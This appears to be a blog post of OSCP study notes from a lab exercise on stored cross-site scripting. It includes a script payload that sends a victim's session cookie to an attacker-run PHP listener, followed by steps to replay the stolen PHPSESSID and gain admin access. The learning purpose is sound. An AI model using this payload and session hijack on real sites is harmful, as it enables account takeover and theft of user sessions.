OSCP Learning Notes - WebApp Exploitation(2)
Cross-Site Scripting(XSS)
1. Using the tool - netdiscover to find the IP of target server.
netdiscover
2.Browser the website http://10.0.0.21 through Firefox.
3. Click 'Test' . Then write the following script in the text box.
<script>alter('XSS')</script>
4.Create the index.php in the root folder.
<?php $cookie = isset($_GET["test"])?$_GET['test']:""; ?>
5. Start the php service.
service apache2 stop php -S 10.0.0.109:80
6. Write the following script in the text box, then click the "Submit Query" button.
<script>location.href='http://10.0.0.109/index.php?test='+document.cookie;</script>
7. Install the Cookie Manager on the Firefox.
8. Edit the PHPSESSID value in the Cookies Manager tool and change the value to the PHPSESSID showed in Kali Linux terminal. Then save the cookie value.
9. After change the cookie value - PHPSESSID. Click the 'Admin' buttion, then you can login without username and password. You obtain the administrator privileges.
相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步